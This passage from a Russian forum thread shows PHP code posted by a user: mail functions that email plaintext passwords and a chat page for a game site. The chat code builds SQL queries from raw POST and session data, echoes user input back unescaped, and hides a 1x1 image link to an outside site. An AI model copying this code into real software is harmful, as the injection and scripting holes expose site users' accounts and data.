$text.= "Ссылка для регистрации: <a href='http://".$this->Hosts."/signup/key/{$key}'>";
$text.= "http://".$this->Hosts."/signup/key/{$key}</a>";
$subject = "Регистрация в системе \"".$this->Hosts."\"";
return $this->SendMail($mail, $subject, $text);
}
/*======================================================================*\
Function: RecoveryPassword
Descriiption: Восстановление пароля
\*======================================================================*/
function RecoveryPassword($user, $pass, $mail){
$text.= "Данные для входа в личный кабинет пользователя: <BR />";
$text.= "<b>Логин:</b> {$user}<BR />";
$text.= "<b>Пароль:</b> {$pass}<BR />";
$text.= "Ссылка для входа в кабинет: <a href='http://".$this->Hosts."/signin'>http://".$this->Hosts."/signin</a>";
$subject = "Восстановление забытого пароля в системе \"".$this->Hosts."\"";
return $this->SendMail($mail, $subject, $text);
}
/*======================================================================*\
Function: SendAfterReg
Descriiption: Отправляет данные после регистрации
\*======================================================================*/
function SendAfterReg($user, $mail, $pass){
$text = "Благодарим вас за регистрацию в системе в системе \"".$this->Hosts."\"<BR />";
$text.= "Ваши данные для входа в личный кабинет пользователя: <BR />";
$text.= "<b>Логин:</b> {$user}<BR />";
$text.= "<b>Пароль:</b> {$pass}<BR />";
$text.= "Ссылка для входа в кабинет: <a href='http://".$this->Hosts."/signin'>http://".$this->Hosts."/signin</a>";
$subject = "Завершение регистрации в системе \"".$this->Hosts."\"";
return $this->SendMail($mail, $subject, $text);
}
/*======================================================================*\
Function: SetNewPassword
Descriiption: Отправляет данные после смены пароля
\*======================================================================*/
function SetNewPassword($user, $pass, $mail){
$text = "В настройках вашего аккаунта был изменен пароль<BR />";
$text.= "Ваши новые данные для входа в личный кабинет пользователя: <BR />";
$text.= "<b>Логин:</b> {$user}<BR />";
$text.= "<b>Новый пароль:</b> {$pass}<BR />";
$text.= "Ссылка для входа в кабинет: <a href='http://".$this->Hosts."/signin'>http://".$this->Hosts."/signin</a>";
$subject = "Смена пароля в системе \"".$this->Hosts."\"";
return $this->SendMail($mail, $subject, $text);
}
/*======================================================================*\
Function: Headers
Descriiption: Создание заголовков письма
\*======================================================================*/
function Headers(){
$headers = "MIME-Version: 1.0\r\n";
$headers.= "Content-type: text/html; charset=Windows-1251\r\n";
$headers.= "Date: ".date("m.d.Y (H:i:s)",time())."\r\n";
$headers.= "From: support@".$this->Hosts." \r\n";
return $headers;
}
/*======================================================================*\
Function: SendMail
Descriiption: Отправитель
\*======================================================================*/
function SendMail($recipient, $subject, $message){
$message .= "<BR />----------------------------------------------------
<BR />Сообщение было выслано роботом, пожалуйста, не отвечайте на него!";
}
}
?>
aleksssandr84
Участник
- Сообщения
- 18
- Реакции
- 2
Еще на всякий случай приложу файл чата
Код:
<?PHP
$_OPTIMIZATION["title"] = "Беседка";
$usid = $_SESSION["user_id"];
$uname = $_SESSION["user"];
$db->Query("SELECT * FROM db_users_b WHERE id = '$usid' LIMIT 1");
$user_data = $db->FetchArray();
$dadd = time();
?>
<div class="s-bk-lf">
<div class="acc-title">Беседка</div>
</div>
<div class="silver-bk">
<table cellpadding='3' cellspacing='0' border='0' align='center' width="550" BGCOLOR="#ffffff" >
<?PHP
$db->Query("SELECT * FROM db_chat ORDER BY id DESC LIMIT 30");
if($db->NumRows() > 0){
while($bon = $db->FetchArray()){
?>
<tr>
<td colspan="2"><HR SIZE="2" WIDTH="90%" ALIGN="center" COLOR="#ffffff"></td></tr><tr>
<td align="left" width="300">
<font color=blue>
<b><?=$bon["user"]; ?></b></font></td><td align="right" width="200"><font color=blue><?=date("d.m.Y",$bon["date_add"]); ?></td></tr><tr>
<td colspan="2" align="left"><? if ($bon["user"]=="admin") # если ник пользователя в чате админ- то его сообщения имеют следующий цвет:
{?><font color=#ffffff> <? } ?> <?=$bon["tekst"]; ?></td>
</tr>
<?PHP
}
}else echo '<tr><td align="center" colspan="3">Нет записей</td></tr>'
?>
<tr>
<td colspan="2" align="center"><h4><font color="white">Показаны последние 30 сообщений</font></h4></td>
</tr>
</table>
<?PHP
if(isset($_POST["chat"])) {
$text =$_POST["ntext"];
if($user_data["money_b"] >0) # проверяем наличие денег
{
if (preg_match("/[\>|\<]/",$text)) # запрещаем символы < и >
{ echo "<center><b><font color = 'red'>Сообщение содержит запрещенные символы</font></b></center><BR />";
} else {
$db->Query("INSERT INTO db_chat (user, tekst, date_add) VALUES ('$uname','$text','$dadd')");
$db->Query("UPDATE db_users_b SET money_b = money_b - 0 WHERE id = '$usid'");
echo "<center><b><font color = 'blue'>Сообщение отправлено</font></b></center><BR />";
}
} else echo "<center><b><font color = 'red'>Недостаточно серебра для общения</font></b></center><BR />";
}
?>
<center><?PHP if($user_data["money_b"] >0) {?><form action="" method="post">
<b>Сообщение:</b> [Отправка бесплатная!]<BR />
<textarea name="ntext" cols="50" rows="3"><?=(isset($_POST["ntext"])) ? $_POST["ntext"] : false; ?></textarea><BR />
<center><input type="submit" name="chat" value="отправить" /></center>
</form><font color="blue"><b>Внимание! Запрещены теги, ссылки, реклама, оскорбление участников и Администрации проекта. В случае нарушения пользователь может быть оштрафован или забанен.</b></font> <?PHP } else { ?> Стоимость сообщения 10 Эко$ - на вашем счёте недостаточно средств.<?PHP } ?></center>
<div class="clr"></div>
</div>
<div align="center" style="font-size:8px">
<a href="http://red4u.ru/">
<img src="http://red4u.ru/uploads/baner_red.png" border="0" width="1" height="1" />
</a></div>
</div>